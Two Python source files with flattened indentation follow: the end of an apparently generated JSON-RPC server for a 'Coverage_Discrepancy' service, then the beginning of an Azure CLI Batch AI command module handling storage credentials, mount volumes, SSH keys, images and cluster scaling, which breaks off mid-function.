result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Coverage_Discrepancy'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Coverage_Discrepancy.run_Coverage_Discrepancy,
name='Coverage_Discrepancy.run_Coverage_Discrepancy',
types=[dict])
self.method_authentication['Coverage_Discrepancy.run_Coverage_Discrepancy'] = 'required' # noqa
self.rpc_service.add(impl_Coverage_Discrepancy.status,
name='Coverage_Discrepancy.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Coverage_Discrepancy ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
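# Example (sketch): run the test server in a child process on an OS-assigned
# port, issue JSON-RPC POSTs against http://localhost:<port>, then stop it.
#   port = start_server(newprocess=True)
#   ...
#   stop_server()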
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-many-lines
from __future__ import print_function
import collections
import copy
import datetime
import json
import os
import signal
import socket
import string
import sys
import threading
import time
from functools import partial
from random import shuffle
import paramiko
import requests
from knack.log import get_logger
from knack.util import CLIError
from msrest.serialization import Deserializer
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from six.moves import urllib_parse
from azure.cli.core import keys
from azure.cli.core.util import get_default_admin_username
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.profiles import ResourceType, get_sdk
import azure.mgmt.batchai.models as models
# Environment variables for specifying azure storage account and key. We want the user to make an explicit
# decision about which storage account to use instead of silently picking up the default account specified via
# AZURE_STORAGE_ACCOUNT and AZURE_STORAGE_KEY.
AZURE_BATCHAI_STORAGE_ACCOUNT = 'AZURE_BATCHAI_STORAGE_ACCOUNT'
AZURE_BATCHAI_STORAGE_KEY = 'AZURE_BATCHAI_STORAGE_KEY'
MSG_CONFIGURE_STORAGE_ACCOUNT = 'Please configure Azure Storage account name via AZURE_BATCHAI_STORAGE_ACCOUNT or ' \
'provide storage_account value in batchai section of your az configuration file.'
MSG_CONFIGURE_STORAGE_KEY = 'Please configure Azure Storage account key via AZURE_BATCHAI_STORAGE_KEY or ' \
'provide storage_key value in batchai section of your az configuration file.'
STANDARD_OUTPUT_DIRECTORY_ID = 'stdouterr'
# Parameters of auto storage
AUTO_STORAGE_RESOURCE_GROUP = 'batchaiautostorage'
AUTO_STORAGE_CONTAINER_NAME = 'batchaicontainer'
AUTO_STORAGE_SHARE_NAME = 'batchaishare'
AUTO_STORAGE_ACCOUNT_PREFIX = 'bai'
AUTO_STORAGE_CONTAINER_PATH = 'autobfs'
AUTO_STORAGE_SHARE_PATH = 'autoafs'
# Placeholders which the customer may use in the config file for cluster creation.
AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_KEY)
AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_ACCOUNT)
# Default expiration time for file download URLs.
DEFAULT_URL_EXPIRY_MIN = 60
# Supported images.
SUPPORTED_IMAGE_ALIASES = {
"UbuntuLTS": models.ImageReference(
publisher='Canonical',
offer='UbuntuServer',
sku='16.04-LTS'
),
"UbuntuDSVM": models.ImageReference(
publisher='microsoft-ads',
offer='linux-data-science-vm-ubuntu',
sku='linuxdsvmubuntu'
)
}
# Type of entries reported by list startup files.
LogFile = collections.namedtuple('LogFile', 'name download_url is_directory size')
logger = get_logger(__name__)
def _get_resource_group_location(cli_ctx, resource_group):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
return client.resource_groups.get(resource_group).location
def _get_workspace_location(client, resource_group, workspace_name):
workspace = client.workspaces.get(resource_group, workspace_name)
return workspace.location
def _get_default_ssh_public_key_location():
path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub')
if os.path.exists(path):
return path
return None
def _get_deserializer():
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
return Deserializer(client_models)
def _ensure_resource_not_exist(client, resource_group, workspace, name):
try:
client.get(resource_group, workspace, name)
raise CLIError('"{0}" already exists in "{1}" resource group under {2} resource group.'.format(
name, resource_group, workspace))
except CloudError as e:
if e.status_code != 404:
raise
def _ensure_job_not_exist(client, resource_group, workspace, experiment, name):
try:
client.get(resource_group, workspace, experiment, name)
raise CLIError('A job with given name, experiment, workspace and resource group already exists.')
except CloudError as e:
if e.status_code != 404:
raise
def _ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name):
if not subnet:
return
if not is_valid_resource_id(subnet):
raise CLIError('Ill-formed subnet resource id')
# check there are no conflicts between provided subnet and mounted nfs
if not nfs_name:
return
nfs = None # type: models.FileServer
try:
nfs = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
except CloudError as e:
if e.status_code != 404:
raise
if not nfs:
# CLI will return the error during nfs validation
return
if nfs.subnet.id != subnet:
raise CLIError('Cluster and mounted NFS must be in the same subnet.')
def _get_storage_management_client(cli_ctx):
from azure.mgmt.storage import StorageManagementClient
return get_mgmt_service_client(cli_ctx, StorageManagementClient)
def _get_storage_account_key(cli_ctx, account_name, account_key):
"""Returns account key for the given storage account.
:param str account_name: storage account name.
:param str or None account_key: account key provide as command line argument.
"""
if account_key:
return account_key
storage_client = _get_storage_management_client(cli_ctx)
account = [a.id for a in list(storage_client.storage_accounts.list()) if a.name == account_name]
if not account:
raise CLIError('Cannot find "{0}" storage account.'.format(account_name))
resource_group = parse_resource_id(account[0])['resource_group']
keys_list_result = storage_client.storage_accounts.list_keys(resource_group, account_name)
if not keys_list_result or not keys_list_result.keys:
raise CLIError('Cannot find a key for "{0}" storage account.'.format(account_name))
return keys_list_result.keys[0].value
def _get_effective_storage_account_name_and_key(cli_ctx, account_name, account_key):
"""Returns storage account name and key to be used.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
"""
if account_name:
return account_name, _get_storage_account_key(cli_ctx, account_name, account_key) or ''
return cli_ctx.config.get('batchai', 'storage_account', ''), cli_ctx.config.get('batchai', 'storage_key', '')
def _get_account_name_from_azure_file_url(azure_file_url):
"""Extracts account name from Azure File URL
:param str azure_file_url: Azure File URL
:return str: account name
"""
if not azure_file_url:
        raise CLIError('Azure File URL cannot be absent or empty')
o = urllib_parse.urlparse(azure_file_url)
try:
account, _ = o.netloc.split('.', 1)
return account
except ValueError:
raise CLIError('Ill-formed Azure File URL "{0}"'.format(azure_file_url))
def _get_effective_credentials(cli_ctx, existing_credentials, account_name):
"""Returns AzureStorageCredentialInfo for the account
:param models.AzureStorageCredentialsInfo existing_credentials: known credentials
:param str account_name: storage account name
:return models.AzureStorageCredentialsInfo: credentials to be used
"""
if existing_credentials and (existing_credentials.account_key or existing_credentials.account_key_secret_reference):
return existing_credentials
return models.AzureStorageCredentialsInfo(
account_key=_get_storage_account_key(cli_ctx, account_name, account_key=None))
def _patch_mount_volumes(cli_ctx, volumes, account_name=None, account_key=None):
"""Patches mount volumes by replacing placeholders and adding credentials information.
:param models.MountVolumes or None volumes: mount volumes.
:param str or None account_name: name of the storage account provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
    :return models.MountVolumes or None: updated mount volumes.
"""
if volumes is None:
return None
result = copy.deepcopy(volumes) # type: models.MountVolumes
storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(
cli_ctx, account_name, account_key)
require_storage_account = False
require_storage_account_key = False
# Patch parameters of azure file share.
if result.azure_file_shares:
for ref in result.azure_file_shares:
# Populate account name if it was not provided
if not ref.account_name:
ref.account_name = _get_account_name_from_azure_file_url(ref.azure_file_url)
# Replace placeholders
if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
require_storage_account = True
ref.account_name = storage_account_name
if ref.azure_file_url and AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER in ref.azure_file_url:
require_storage_account = True
ref.azure_file_url = ref.azure_file_url.replace(
AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER, storage_account_name)
if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
require_storage_account_key = True
ref.credentials.account_key = storage_account_key
if not ref.credentials and ref.account_name == storage_account_name:
require_storage_account_key = True
ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
if ref.account_name:
ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
# Patch parameters of blob file systems.
if result.azure_blob_file_systems:
for ref in result.azure_blob_file_systems:
# Replace placeholders
if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
require_storage_account = True
ref.account_name = storage_account_name
if ref.credentials and ref.credentials.account_key == AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER:
require_storage_account_key = True
ref.credentials.account_key = storage_account_key
if not ref.credentials and ref.account_name == storage_account_name:
require_storage_account_key = True
ref.credentials = models.AzureStorageCredentialsInfo(account_key=storage_account_key)
# Populate the rest of credentials based on the account name
if not ref.account_name:
raise CLIError('Ill-formed Azure Blob File System reference in the configuration file - no account '
'name provided.')
if ref.account_name:
ref.credentials = _get_effective_credentials(cli_ctx, ref.credentials, ref.account_name)
if require_storage_account and not storage_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if require_storage_account_key and not storage_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
return result
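# Example: a cluster config may use "<AZURE_BATCHAI_STORAGE_ACCOUNT>" and
# "<AZURE_BATCHAI_STORAGE_KEY>" inside its mount volumes; _patch_mount_volumes
# substitutes the effective account name/key resolved from the command line or
# the az config, and raises a CLIError if a required value cannot be resolved.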
def _update_user_account_settings(params, admin_user_name, ssh_key, password):
"""Update account settings of cluster or file server creation parameters
:param models.ClusterCreateParameters or models.FileServerCreateParameters params: params to update
:param str or None admin_user_name: name of admin user to create.
:param str or None ssh_key: ssh public key value or path to the file containing the key.
:param str or None password: password.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(params)
if hasattr(result, 'user_account_settings'):
parent = result
else:
if result.ssh_configuration is None:
result.ssh_configuration = models.SshConfiguration(user_account_settings=None)
parent = result.ssh_configuration
if parent.user_account_settings is None:
parent.user_account_settings = models.UserAccountSettings(admin_user_name=None)
# Get effective user name, password and key trying them in the following order: provided via command line,
# provided in the config file, current user name and his default public ssh key.
effective_user_name = admin_user_name or parent.user_account_settings.admin_user_name or get_default_admin_username() # pylint: disable=line-too-long
effective_password = password or parent.user_account_settings.admin_user_password
# Use default ssh public key only if no password is configured.
effective_key = (ssh_key or parent.user_account_settings.admin_user_ssh_public_key or
(None if effective_password else _get_default_ssh_public_key_location()))
if effective_key:
if os.path.exists(os.path.expanduser(effective_key)):
with open(os.path.expanduser(effective_key)) as f:
effective_key = f.read()
try:
if effective_key and not keys.is_valid_ssh_rsa_public_key(effective_key):
raise CLIError('Incorrect ssh public key value.')
except Exception:
raise CLIError('Incorrect ssh public key value.')
parent.user_account_settings.admin_user_name = effective_user_name
parent.user_account_settings.admin_user_ssh_public_key = effective_key
parent.user_account_settings.admin_user_password = effective_password
if not parent.user_account_settings.admin_user_name:
raise CLIError('Please provide admin user name.')
if (not parent.user_account_settings.admin_user_ssh_public_key and
not parent.user_account_settings.admin_user_password):
raise CLIError('Please provide admin user password or ssh key.')
return result
def _add_nfs_to_mount_volumes(volumes, file_server_id, mount_path):
"""Adds NFS to the mount volumes.
:param models.MountVolumes or None volumes: existing mount volumes.
:param str file_server_id: resource id of the file server.
:param str mount_path: relative mount path for the file server.
:return models.MountVolumes: updated mount volumes.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('File server relative mount path cannot be empty.')
if result.file_servers is None:
result.file_servers = []
result.file_servers.append(models.FileServerReference(
relative_mount_path=mount_path,
file_server=models.ResourceId(id=file_server_id),
mount_options="rw"))
return result
def _get_azure_file_url(cli_ctx, account_name, azure_file_share):
"""Returns Azure File URL for the given account
:param str account_name: account name
:param str azure_file_share: name of the share
:return str: Azure File URL to be used in mount volumes
"""
return 'https://{0}.file.{1}/{2}'.format(account_name, cli_ctx.cloud.suffixes.storage_endpoint, azure_file_share)
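# Example (editor's sketch, not part of the original module): for the public Azure
# cloud the storage endpoint suffix is 'core.windows.net', so
# _get_azure_file_url(cli_ctx, 'myaccount', 'myshare') would return
# 'https://myaccount.file.core.windows.net/myshare'; other clouds supply their own
# suffix via cli_ctx.cloud.suffixes.storage_endpoint.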
def _add_azure_file_share_to_mount_volumes(cli_ctx, volumes, azure_file_share, mount_path, account_name=None,
account_key=None):
"""Add Azure File share to the mount volumes.
:param models.MountVolumes or None volumes: existing mount volumes.
:param str azure_file_share: name of the azure file share.
:param str mount_path: relative mount path for Azure File share.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.MountVolumes: updated mount volumes.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('Azure File share relative mount path cannot be empty.')
if result.azure_file_shares is None:
result.azure_file_shares = []
effective_account_name, effective_account_key = _get_effective_storage_account_name_and_key(cli_ctx, account_name,
account_key)
if not effective_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if not effective_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
result.azure_file_shares.append(models.AzureFileShareReference(
relative_mount_path=mount_path,
account_name=effective_account_name,
azure_file_url=_get_azure_file_url(cli_ctx, effective_account_name, azure_file_share),
credentials=models.AzureStorageCredentialsInfo(account_key=effective_account_key)))
return result
def _add_azure_container_to_mount_volumes(cli_ctx, volumes, container_name, mount_path, account_name=None,
account_key=None):
"""Add Azure Storage container to the mount volumes.
:param models.MountVolumes or None volumes: existing mount volumes.
:param str container_name: container name.
:param str mount_path: relative mount path for the container.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.MountVolumes: updated mount volumes.
"""
result = copy.deepcopy(volumes) if volumes else models.MountVolumes()
if not mount_path:
raise CLIError('Azure Storage Container relative mount path cannot be empty.')
if result.azure_blob_file_systems is None:
result.azure_blob_file_systems = []
storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(cli_ctx, account_name,
account_key)
if not storage_account_name:
raise CLIError(MSG_CONFIGURE_STORAGE_ACCOUNT)
if not storage_account_key:
raise CLIError(MSG_CONFIGURE_STORAGE_KEY)
result.azure_blob_file_systems.append(models.AzureBlobFileSystemReference(
relative_mount_path=mount_path,
account_name=storage_account_name,
container_name=container_name,
credentials=models.AzureStorageCredentialsInfo(account_key=storage_account_key)))
return result
def _get_image_reference(image, custom_image):
"""Returns image reference for the given image and custom image.
:param str or None image: image alias or full spec.
:param str or None custom_image: resource id of the custom image.
:raise CLIError: if the image with given alias was not found.
"""
if custom_image and not image:
raise CLIError('You need to specify --image argument with information about the custom image')
if custom_image and not is_valid_resource_id(custom_image):
raise CLIError('Ill-formed custom image resource id')
if ':' in image:
# full image specification is provided
try:
publisher, offer, sku, version = image.split(':')
if not publisher:
raise CLIError('Image publisher must be provided in --image argument')
if not offer:
raise CLIError('Image offer must be provided in --image argument')
if not sku:
raise CLIError('Image sku must be provided in --image argument')
return models.ImageReference(
publisher=publisher,
offer=offer,
sku=sku,
version=version or None,
virtual_machine_image_id=custom_image
)
except ValueError:
raise CLIError('--image must have format "publisher:offer:sku:version" or "publisher:offer:sku:"')
# image alias is used
reference = None
for alias, value in SUPPORTED_IMAGE_ALIASES.items():
if alias.lower() == image.lower():
reference = value
if not reference:
raise CLIError('Unsupported image alias "{0}", supported aliases are {1}'.format(
image, ', '.join(SUPPORTED_IMAGE_ALIASES.keys())))
result = copy.deepcopy(reference)
result.virtual_machine_image_id = custom_image
return result
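# Example (editor's sketch): '--image Canonical:UbuntuServer:16.04-LTS:latest' splits into
# publisher='Canonical', offer='UbuntuServer', sku='16.04-LTS', version='latest'; a trailing
# colon with no version ('Canonical:UbuntuServer:16.04-LTS:') leaves version=None so the
# latest image is used. A value without ':' is treated as an alias and looked up
# case-insensitively in SUPPORTED_IMAGE_ALIASES.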
def _get_scale_settings(initial_count, min_count, max_count):
"""Returns scale settings for a cluster with given parameters"""
if not initial_count and not min_count and not max_count:
# Get from the config file
return None
if (min_count is None) != (max_count is None):
raise CLIError('You need to either provide both min and max node counts or not provide any of them')
if min_count is not None and max_count is not None and min_count > max_count:
raise CLIError('Maximum node count must be greater than or equal to the minimum node count')
if min_count == max_count:
if min_count is None or initial_count == min_count:
return models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=initial_count))
if initial_count is None:
return models.ScaleSettings(
manual=models.ManualScaleSettings(target_node_count=min_count)
)
return models.ScaleSettings(
auto_scale=models.AutoScaleSettings(
minimum_node_count=min_count,
maximum_node_count=max_count,
initial_node_count=initial_count or 0))
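# Examples (editor's sketch): _get_scale_settings(4, None, None) yields manual scaling with
# target_node_count=4, while _get_scale_settings(None, 2, 8) yields auto-scaling between
# 2 and 8 nodes with an initial count of 0. Providing only one of min/max raises a CLIError.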
def _update_nodes_information(params, image, custom_image, vm_size, vm_priority, target, min_nodes, max_nodes):
"""Updates cluster's nodes information.
:param models.ClusterCreateParameters params: cluster create parameters.
:param str or None image: image.
:param str or None custom_image: custom image resource id.
:param str or None vm_size: VM size.
:param str vm_priority: Priority.
:param int or None target: initial number of nodes.
:param int or None min_nodes: min number of nodes.
:param int or None max_nodes: max number of nodes.
:return models.ClusterCreateParameters: updated parameters.
"""
result = copy.deepcopy(params)
if vm_size:
result.vm_size = vm_size
if not result.vm_size:
raise CLIError('Please provide VM size')
if vm_priority:
result.vm_priority = vm_priority
if image or custom_image:
result.virtual_machine_configuration = models.VirtualMachineConfiguration(
image_reference=_get_image_reference(image, custom_image))
scale_settings = _get_scale_settings(target, min_nodes, max_nodes)
if scale_settings:
result.scale_settings = scale_settings
if not result.scale_settings or (not result.scale_settings.manual and not result.scale_settings.auto_scale):
raise CLIError('Please provide scale setting for the cluster via command line or configuration file')
return result
def _get_auto_storage_resource_group():
return AUTO_STORAGE_RESOURCE_GROUP
def _configure_auto_storage(cli_ctx, location):
"""Configures auto storage account for the cluster
:param str location: location for the auto-storage account.
:return (str, str): a tuple with auto storage account name and key.
"""
ResourceGroup = get_sdk(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, 'ResourceGroup', mod='models')
BlockBlobService, FileService = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
'blob#BlockBlobService', 'file#FileService')
resource_group = _get_auto_storage_resource_group()
resource_client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
if resource_client.resource_groups.check_existence(resource_group):
logger.warning('BatchAI will use existing %s resource group for auto-storage account',
resource_group)
else:
logger.warning('Creating %s resource group for auto-storage account', resource_group)
resource_client.resource_groups.create_or_update(
resource_group, ResourceGroup(location=location))
storage_client = _get_storage_management_client(cli_ctx)
account = None
for a in storage_client.storage_accounts.list_by_resource_group(resource_group):
if a.primary_location == location.lower().replace(' ', ''):
account = a.name
logger.warning('Using existing %s storage account as an auto-storage account', account)
break
if account is None:
account = _create_auto_storage_account(storage_client, resource_group, location)
logger.warning('Created auto storage account %s', account)
key = _get_storage_account_key(cli_ctx, account, None)
file_service = FileService(account, key)
file_service.create_share(AUTO_STORAGE_SHARE_NAME, fail_on_exist=False)
blob_service = BlockBlobService(account, key)
blob_service.create_container(AUTO_STORAGE_CONTAINER_NAME, fail_on_exist=False)
return account, key
def _generate_auto_storage_account_name():
"""Generates unique name for auto storage account"""
